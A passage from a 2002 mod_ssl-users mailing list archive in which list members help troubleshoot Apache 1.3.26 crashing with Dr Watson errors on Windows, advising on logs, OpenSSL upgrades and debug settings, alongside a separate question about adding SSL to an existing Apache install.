> using one of the new builds I made?

> 

> Advice: This error might happen if you did not =
have all of 

> the parts or 

> it is misconfigured.  You may find a clue =
in the error.log.  Have you 

> ever had this working or are you failing on an =
initial install.

> 

> Chris.

> 

> =
______________________________________________________________________

> Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

> User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

> Automated List =
Manager           =
;            =
;     majordomo@modssl.org

> 





------_=_NextPart_001_01C268DE.A28356A0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:23:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16529; Tue, 1 Oct 2002 02:22:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts15-srv.bellnexxia.net id CAA16523; Tue, 1 Oct 2002 02:21:47 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts15-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021001002145.CBKT12486.tomts15-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 20:21:45 -0400
Message-ID: <3D98EAAD.6010902@sympatico.ca>
Date: Mon, 30 Sep 2002 20:22:05 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache.exe generates errors and is closed by Windows.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> Chris,
> 
> I upgraded our system to use OpenSSL 0.9.6g from your latest build. 
> However, the error I was referring to occurred in the previous build 
> that had version 0.9.6d of OpenSSL.
> 
> The error is a Dr.Watson error. The usual popup box comes with the above 
> message and until the user acknowledges, the system doesn't service any 
> requests. There aren't any useful messages that get logged either.
> 
> The complete message is as follows:
> "Apache.exe generates errors and will be closed by Windows. You will 
> need to restart the program. An error log is being created."
> 
> 
> 
>  > -----Original Message-----
>  > From: hunter [mailto:theantigod@sympatico.ca]
>  > Sent: Monday, September 30, 2002 4:59 PM
>  > To: modssl-users@modssl.org
>  > Subject: Re: Apache.exe generates errors and is closed by Windows.
>  >
>  >
>  > Ramakrishna Kuppa wrote:
>  > > I am getting the above error on my Windows platform. The
>  > environment
>  > > details are as follows:
>  > >
>  > > OS: Windows 2000
>  > > Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10
>  > >
>  > > The OS pops up a box with the above message and until the user
>  > > acknowledges, the system doesn't respond to any user
>  > requests. In a way,
>  > > the system "hangs".
>  > >
>  > > Any ideas on how this can be resolved? Alternatively, can
>  > the server
>  > > be
>  > > made to service user requests?
>  > >
>  > > Thanks
>  > > Ramakrishna
>  > >
>  >
>  > Ramakrishna,
>  >
>  > Could you please explain what is 'the above error'.
>  >
>  > Guess: Are you referring to an abnormal end.. a dialog that says a
>  > program is exiting unexpectedly?
>  >
>  > Warning: You should not be using OpenSSL 0.9.6d - I thought you were
>  > using one of the new builds I made?
>  >
>  > Advice: This error might happen if you did not have all of
>  > the parts or
>  > it is misconfigured.  You may find a clue in the error.log.  Have you
>  > ever had this working or are you failing on an initial install.
>  >
>  > Chris.
>  >
>  > ______________________________________________________________________
>  > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>  > User Support Mailing List                      modssl-users@modssl.org
>  > Automated List Manager                            majordomo@modssl.org
>  >
> 

Ramakrishna,

It would be helpful to see the apache error log ... usually called 
'error.log' in the ..\Apache\logs directory.

Also, the Dr Watson log can also be useful but less so when I do not 
have the same build - with the same build I can walk it into the failure 
with the debugger.  The Dr Watson log can be found in the %SystemRoot% 
.. mine is I:\WINDOWS (XP PRO) yours could be C:\WINNT - the file is 
called 'drwtsn32.log'

This could have been caused by a buffer overrun ... like in a failed 
exploit ... previous versions of OpenSSL were vulnerable.

I will look at the log if you send it.  Maybe there will be clues.


The new code is ok?

Chris.






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:25:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16615; Tue, 1 Oct 2002 02:24:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id CAA16553; Tue, 1 Oct 2002 02:23:33 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Mon, 30 Sep 2002 17:23:26 -0700
Message-ID: <42B8E37890B1E64CB427CE1F260181EADDDD@mail00.sc.esilicon.com>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache.exe generates errors and is closed by Windows.
Date: Mon, 30 Sep 2002 17:23:21 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C268E0.BFA00FBA"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C268E0.BFA00FBA
Content-Type: text/plain;
	charset="iso-8859-1"

Rama,
 
If you are not getting much information, you might try in your apache
https.conf file turning on debugging with "LogLevel debug". This may not
help, but sometimes you can find a clue as to where apache was in it's
processing when a failure occurs.
 
David Marshall

-----Original Message-----
From: Ramakrishna Kuppa [mailto:ramakrishna@intruvert.com]
Sent: Monday, September 30, 2002 5:08 PM
To: 'modssl-users@modssl.org'
Subject: RE: Apache.exe generates errors and is closed by Windows.



Chris, 

I upgraded our system to use OpenSSL 0.9.6g from your latest build. However,
the error I was referring to occurred in the previous build that had version
0.9.6d of OpenSSL.

The error is a Dr.Watson error. The usual popup box comes with the above
message and until the user acknowledges, the system doesn't service any
requests. There aren't any useful messages that get logged either.

The complete message is as follows: 
"Apache.exe generates errors and will be closed by Windows. You will need to
restart the program. An error log is being created."



> -----Original Message----- 
> From: hunter [ mailto:theantigod@sympatico.ca
 ] 
> Sent: Monday, September 30, 2002 4:59 PM 
> To: modssl-users@modssl.org 
> Subject: Re: Apache.exe generates errors and is closed by Windows. 
> 
> 
> Ramakrishna Kuppa wrote: 
> > I am getting the above error on my Windows platform. The 
> environment 
> > details are as follows: 
> > 
> > OS: Windows 2000 
> > Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10 
> > 
> > The OS pops up a box with the above message and until the user 
> > acknowledges, the system doesn't respond to any user 
> requests. In a way, 
> > the system "hangs". 
> > 
> > Any ideas on how this can be resolved? Alternatively, can 
> the server 
> > be 
> > made to service user requests? 
> > 
> > Thanks 
> > Ramakrishna 
> > 
> 
> Ramakrishna, 
> 
> Could you please explain what is 'the above error'. 
> 
> Guess: Are you referring to an abnormal end.. a dialog that says a 
> program is exiting unexpectedly? 
> 
> Warning: You should not be using OpenSSL 0.9.6d - I thought you were 
> using one of the new builds I made? 
> 
> Advice: This error might happen if you did not have all of 
> the parts or 
> it is misconfigured.  You may find a clue in the error.log.  Have you 
> ever had this working or are you failing on an initial install. 
> 
> Chris. 
> 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
> User Support Mailing List                      modssl-users@modssl.org 
> Automated List Manager                            majordomo@modssl.org 
> 


------_=_NextPart_001_01C268E0.BFA00FBA
Content-Type: text/html;
	charset="iso-8859-1"




RE: Apache.exe generates errors and is closed by Windows.




Rama,


 


If you 
are not getting much information, you might try in your apache https.conf file 
turning on debugging with "LogLevel debug". This may not help, but sometimes you 
can find a clue as to where apache was in it's processing when a failure 
occurs.


 


David 
Marshall



------_=_NextPart_001_01C268E0.BFA00FBA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:38:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA16903; Tue, 1 Oct 2002 02:37:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts24-srv.bellnexxia.net id CAA16896; Tue, 1 Oct 2002 02:36:27 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts24-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021001003624.TPE17912.tomts24-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 20:36:24 -0400
Message-ID: <3D98EE1E.2030505@sympatico.ca>
Date: Mon, 30 Sep 2002 20:36:46 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache.exe generates errors and is closed by Windows.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> Chris,
> 
> I upgraded our system to use OpenSSL 0.9.6g from your latest build. 
> However, the error I was referring to occurred in the previous build 
> that had version 0.9.6d of OpenSSL.
> 
> The error is a Dr.Watson error. The usual popup box comes with the above 
> message and until the user acknowledges, the system doesn't service any 
> requests. There aren't any useful messages that get logged either.
> 
> The complete message is as follows:
> "Apache.exe generates errors and will be closed by Windows. You will 
> need to restart the program. An error log is being created."

... from first note ... I understand now.
>  Alternatively, can the server be made to service user requests?

I think what you are asking here is... is there a way to continue after 
a Dr Watson message has happened and there is no user to press ok.

There may be, but I have never found it.  I write most of my service and 
console code with structured exception handlers that handle access 
violations, so that most of my applications do not behave this way.  I 
have had some frustration in this because tech's want to leave the 
dialog on the screen for others to see and applications cannot finish 
dying until the user clicks ok.  Sometimes a new instance will start but 
rarely.

Most of the time they are caused by an access violations.  Frequently 
caused by truncated/corrpted files.  One of my applications kept causing 
Explorer to crash when it was infiltrated with Nimda and was being run 
during user signon.

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 02:52:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA17157; Tue, 1 Oct 2002 02:51:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spyder id CAA17153; Tue, 1 Oct 2002 02:51:01 +0200 (MET DST)
Received: from [127.0.0.1] by spyder
  (ArGoSoft Mail Server Plus, Version 1.6 (1.6.0.0)); Mon, 30 Sep 2002 20:50:58 -0400
Message-ID: <003b01c268e4$9b6a43a0$5241d40a@woburn.com>
From: "Martin Dickau" 
To: 
References:  <3D98EE1E.2030505@sympatico.ca>
Subject: Re: Apache.exe generates errors and is closed by Windows.
Date: Mon, 30 Sep 2002 20:50:54 -0400
Organization: ByAllAccounts
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Dickau" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I think what you are asking here is... is there a way to continue after
> a Dr Watson message has happened and there is no user to press ok.
>
> There may be, but I have never found it.

Run drwtsn32.exe and uncheck Visual Notification (or change the setting in
the registry directly).

Martin

Martin Dickau, ByAllAccounts
mdickau@byallaccounts.com



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 03:03:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA17425; Tue, 1 Oct 2002 03:02:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA17417; Tue, 1 Oct 2002 03:01:34 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 00E4B4CE695; Tue,  1 Oct 2002 03:01:35 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A374C287C4; Mon, 30 Sep 2002 20:05:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtprelay6.dc2.adelphia.net id TAA07803; Mon, 30 Sep 2002 19:59:14 +0200 (MET DST)
Received: from monolith ([24.52.130.23]) by
          smtprelay6.dc2.adelphia.net (Netscape Messaging Server 4.15
          smtprelay6 Dec  7 2001 09:58:59) with ESMTP id H39JAD00.F7I for
          ; Mon, 30 Sep 2002 13:59:01 -0400 
From: "Tony Libby" 
To: 
Subject: Rebuild of Apache REQUIRED to add SSL???
Date: Mon, 30 Sep 2002 13:58:33 -0400
Message-ID: <002201c268aa$fe790bf0$6601a8c0@monolith>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0023_01C26889.77676BF0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tony Libby" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0023_01C26889.77676BF0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I'm looking into adding SSL ability to my Apache server.
 
Apache version 1.3.22 running on Red Hat Linux 7.2
 
MUST I REBUILD THE SERVER?
 
I don't really want to do this as everything is running nicely now.
 
If I have to rebuild, what is the SAFEST way?
 
Thanks for your help!
-Tony

------=_NextPart_000_0023_01C26889.77676BF0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






















I’m looking into adding SSL ability to my =
Apache
server.



 



Apache version 1.3.22 running on Red Hat Linux =
7.2



 



MUST I REBUILD THE =
SERVER?



 



I don’t really want to do this as everything is
running nicely now.



 



If I have to rebuild, what is the SAFEST =
way?



 



Thanks for your help!



-Tony









------=_NextPart_000_0023_01C26889.77676BF0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 03:25:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA18166; Tue, 1 Oct 2002 03:24:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts21-srv.bellnexxia.net id DAA18158; Tue, 1 Oct 2002 03:23:25 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts21-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021001012213.TEOA23500.tomts21-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 21:22:13 -0400
Message-ID: <3D98F8DC.9050109@sympatico.ca>
Date: Mon, 30 Sep 2002 21:22:36 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache.exe generates errors and is closed by Windows.
References:  <3D98EE1E.2030505@sympatico.ca> <003b01c268e4$9b6a43a0$5241d40a@woburn.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Martin Dickau wrote:
>>I think what you are asking here is... is there a way to continue after
>>a Dr Watson message has happened and there is no user to press ok.
>>
>>There may be, but I have never found it.
> 
> 
> Run drwtsn32.exe and uncheck Visual Notification (or change the setting in
> the registry directly).
> 
> Martin
> 
> Martin Dickau, ByAllAccounts
> mdickau@byallaccounts.com
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Martin,

I have been inside Dr. Watson dozens of time and have never noticed the 
setting.  I will try it out.

I tried it quickly, but I still got a dialog popup on XP PRO - not a Dr. 
Watson message though.

Thanks
Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 03:31:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA18432; Tue, 1 Oct 2002 03:30:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivexgw1.intruvert.com id DAA18364; Tue, 1 Oct 2002 03:29:21 +0200 (MET DST)
Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59)
	id ; Mon, 30 Sep 2002 18:29:14 -0700
Message-ID: 
From: Ramakrishna Kuppa 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache.exe generates errors and is closed by Windows.
Date: Mon, 30 Sep 2002 18:29:07 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C268E9.EF4A0730"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ramakrishna Kuppa 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C268E9.EF4A0730
Content-Type: text/plain

Chris,

I am getting the following message in my SSL log:

[30/Sep/2002 17:57:49 02000] [info]  Server: Apache/1.3.26, Interface:
mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
[30/Sep/2002 17:57:49 02000] [warn]  You are using mod_ssl under Win32. This
combination is *NOT* officially supported. Use it at your own risk!


Anything to be noted/concerned of?



> -----Original Message-----
> From: hunter [mailto:theantigod@sympatico.ca] 
> Sent: Monday, September 30, 2002 5:22 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache.exe generates errors and is closed by Windows.
> 
> 
> Ramakrishna Kuppa wrote:
> > Chris,
> > 
> > I upgraded our system to use OpenSSL 0.9.6g from your latest build.
> > However, the error I was referring to occurred in the 
> previous build 
> > that had version 0.9.6d of OpenSSL.
> > 
> > The error is a Dr.Watson error. The usual popup box comes with the 
> > above
> > message and until the user acknowledges, the system doesn't 
> service any 
> > requests. There aren't any useful messages that get logged either.
> > 
> > The complete message is as follows:
> > "Apache.exe generates errors and will be closed by Windows. You will
> > need to restart the program. An error log is being created."
> > 
> > 
> > 
> >  > -----Original Message-----
> >  > From: hunter [mailto:theantigod@sympatico.ca]
> >  > Sent: Monday, September 30, 2002 4:59 PM
> >  > To: modssl-users@modssl.org
> >  > Subject: Re: Apache.exe generates errors and is closed 
> by Windows.  
> > >  >
> >  > Ramakrishna Kuppa wrote:
> >  > > I am getting the above error on my Windows platform. The
> >  > environment
> >  > > details are as follows:
> >  > >
> >  > > OS: Windows 2000
> >  > > Server: Apache 1.3.26 with OpenSSL 0.9.6d and mod_ssl 2.8.10
> >  > >
> >  > > The OS pops up a box with the above message and until the user
> >  > > acknowledges, the system doesn't respond to any user
> >  > requests. In a way,
> >  > > the system "hangs".
> >  > >
> >  > > Any ideas on how this can be resolved? Alternatively, can
> >  > the server
> >  > > be
> >  > > made to service user requests?
> >  > >
> >  > > Thanks
> >  > > Ramakrishna
> >  > >
> >  >
> >  > Ramakrishna,
> >  >
> >  > Could you please explain what is 'the above error'.
> >  >
> >  > Guess: Are you referring to an abnormal end.. a dialog 
> that says a
> >  > program is exiting unexpectedly?
> >  >
> >  > Warning: You should not be using OpenSSL 0.9.6d - I 
> thought you were
> >  > using one of the new builds I made?
> >  >
> >  > Advice: This error might happen if you did not have all of
> >  > the parts or
> >  > it is misconfigured.  You may find a clue in the 
> error.log.  Have you
> >  > ever had this working or are you failing on an initial install.
> >  >
> >  > Chris.
> >  >
> >  > 
> ______________________________________________________________________
> >  > Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> >  > User Support Mailing List                 
>      modssl-users@modssl.org
> >  > Automated List Manager                            
> majordomo@modssl.org
> >  >
> > 
> 
> Ramakrishna,
> 
> It would be helpful to see the apache error log ... usually called 
> 'error.log' in the ..\Apache\logs directory.
> 
> Also, the Dr Watson log can also be useful but less so when I do not 
> have the same build - with the same build I can walk it into 
> the failure 
> with the debugger.  The Dr Watson log can be found in the 
> %SystemRoot% 
> .. mine is I:\WINDOWS (XP PRO) yours could be C:\WINNT - the file is 
> called 'drwtsn32.log'
> 
> This could have been caused by a buffer overrun ... like in a failed 
> exploit ... previous versions of OpenSSL were vulnerable.
> 
> I will look at the log if you send it.  Maybe there will be clues.
> 
> 
> The new code is ok?
> 
> Chris.
> 
> 
> 
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

------_=_NextPart_001_01C268E9.EF4A0730
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Apache.exe generates errors and is closed by =
Windows.




Chris,




I am getting the following message in my SSL =
log:




[30/Sep/2002 17:57:49 02000] [info]  Server: =
Apache/1.3.26, Interface: mod_ssl/2.8.10, Library: =
OpenSSL/0.9.6g

[30/Sep/2002 17:57:49 02000] [warn]  You are =
using mod_ssl under Win32. This combination is *NOT* officially =
supported. Use it at your own risk!





Anything to be noted/concerned of?








> -----Original Message-----

> From: hunter [mailto:theantigod@sympatico.ca] 

> Sent: Monday, September 30, 2002 5:22 PM

> To: modssl-users@modssl.org

> Subject: Re: Apache.exe generates errors and is =
closed by Windows.

> 

> 

> Ramakrishna Kuppa wrote:

> > Chris,

> > 

> > I upgraded our system to use OpenSSL =
0.9.6g from your latest build.

> > However, the error I was referring to =
occurred in the 

> previous build 

> > that had version 0.9.6d of OpenSSL.

> > 

> > The error is a Dr.Watson error. The usual =
popup box comes with the 

> > above

> > message and until the user acknowledges, =
the system doesn't 

> service any 

> > requests. There aren't any useful messages =
that get logged either.

> > 

> > The complete message is as follows:

> > "Apache.exe generates errors and will =
be closed by Windows. You will

> > need to restart the program. An error log =
is being created."

> > 

> > 

> > 

> >  > -----Original =
Message-----

> >  > From: hunter [mailto:theantigod@sympatico.ca]

> >  > Sent: Monday, September 30, =
2002 4:59 PM

> >  > To: =
modssl-users@modssl.org

> >  > Subject: Re: Apache.exe =
generates errors and is closed 

> by Windows.  

> > >  >

> >  > Ramakrishna Kuppa wrote:

> >  > > I am getting the above =
error on my Windows platform. The

> >  > environment

> >  > > details are as =
follows:

> >  > >

> >  > > OS: Windows 2000

> >  > > Server: Apache 1.3.26 with =
OpenSSL 0.9.6d and mod_ssl 2.8.10

> >  > >

> >  > > The OS pops up a box with =
the above message and until the user

> >  > > acknowledges, the system =
doesn't respond to any user

> >  > requests. In a way,

> >  > > the system =
"hangs".

> >  > >

> >  > > Any ideas on how this can =
be resolved? Alternatively, can

> >  > the server

> >  > > be

> >  > > made to service user =
requests?

> >  > >

> >  > > Thanks

> >  > > Ramakrishna

> >  > >

> >  >

> >  > Ramakrishna,

> >  >

> >  > Could you please explain what =
is 'the above error'.

> >  >

> >  > Guess: Are you referring to an =
abnormal end.. a dialog 

> that says a

> >  > program is exiting =
unexpectedly?

> >  >

> >  > Warning: You should not be =
using OpenSSL 0.9.6d - I 

> thought you were

> >  > using one of the new builds I =
made?

> >  >

> >  > Advice: This error might happen =
if you did not have all of

> >  > the parts or

> >  > it is misconfigured.  You =
may find a clue in the 

> error.log.  Have you

> >  > ever had this working or are =
you failing on an initial install.

> >  >

> >  > Chris.

> >  >

> >  > 

> =
______________________________________________________________________

> >  > Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        

> www.modssl.org

> >  > User Support Mailing =
List           &n=
bsp;     

>      =
modssl-users@modssl.org

> >  > Automated List =
Manager           =
;            =
;     

> majordomo@modssl.org

> >  >

> > 

> 

> Ramakrishna,

> 

> It would be helpful to see the apache error log =
... usually called 

> 'error.log' in the ..\Apache\logs =
directory.

> 

> Also, the Dr Watson log can also be useful but =
less so when I do not 

> have the same build - with the same build I can =
walk it into 

> the failure 

> with the debugger.  The Dr Watson log can =
be found in the 

> %SystemRoot% 

> .. mine is I:\WINDOWS (XP PRO) yours could be =
C:\WINNT - the file is 

> called 'drwtsn32.log'

> 

> This could have been caused by a buffer overrun =
... like in a failed 

> exploit ... previous versions of OpenSSL were =
vulnerable.

> 

> I will look at the log if you send it.  =
Maybe there will be clues.

> 

> 

> The new code is ok?

> 

> Chris.

> 

> 

> 

> 

> 

> 

> =
______________________________________________________________________

> Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

> User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

> Automated List =
Manager           =
;            =
;     majordomo@modssl.org

> 





------_=_NextPart_001_01C268E9.EF4A0730--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 05:55:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA20824; Tue, 1 Oct 2002 05:54:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts25-srv.bellnexxia.net id FAA20814; Tue, 1 Oct 2002 05:53:09 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts25-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021001035306.VHUP12840.tomts25-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 23:53:06 -0400
Message-ID: <3D991C39.7030305@sympatico.ca>
Date: Mon, 30 Sep 2002 23:53:29 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache.exe generates errors and is closed by Windows.
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ramakrishna Kuppa wrote:
> Chris,
> 
> I am getting the following message in my SSL log:
> 
> [30/Sep/2002 17:57:49 02000] [info]  Server: Apache/1.3.26, Interface: 
> mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> [30/Sep/2002 17:57:49 02000] [warn]  You are using mod_ssl under Win32. 
> This combination is *NOT* officially supported. Use it at your own risk!
> 
> 
> Anything to be noted/concerned of?
> 

Ramakrishna,

I don't know.  While I have been building Apache for several years, I 
have only recently started playing with SSL.  I never used it at all 
with Apache 1.3.26.  It is now integrated into Apache 2.0.xx and that is 
what I am using.  I have never seen a message like this with Apache2.

This message reminds me of the disclaimer that says that Apache for 
Windows should not be considered production quality.  I have never 
personally had any problems with the Windows Apache until version 2.0.xx 
and Windows XP - auto-index was broken with a large number of files the 
last time I checked.

Anyway, I don't think the message is cause for worry.  Maybe someone 
more closely involved with mod_ssl will comment.

I will have a look at the mod_ssl code and see if I can find the source 
of the message - I am curious.

Chris.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  1 06:08:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA21378; Tue, 1 Oct 2002 06:07:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts20-srv.bellnexxia.net id GAA21146; Tue, 1 Oct 2002 06:06:41 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts20-srv.bellnexxia.net
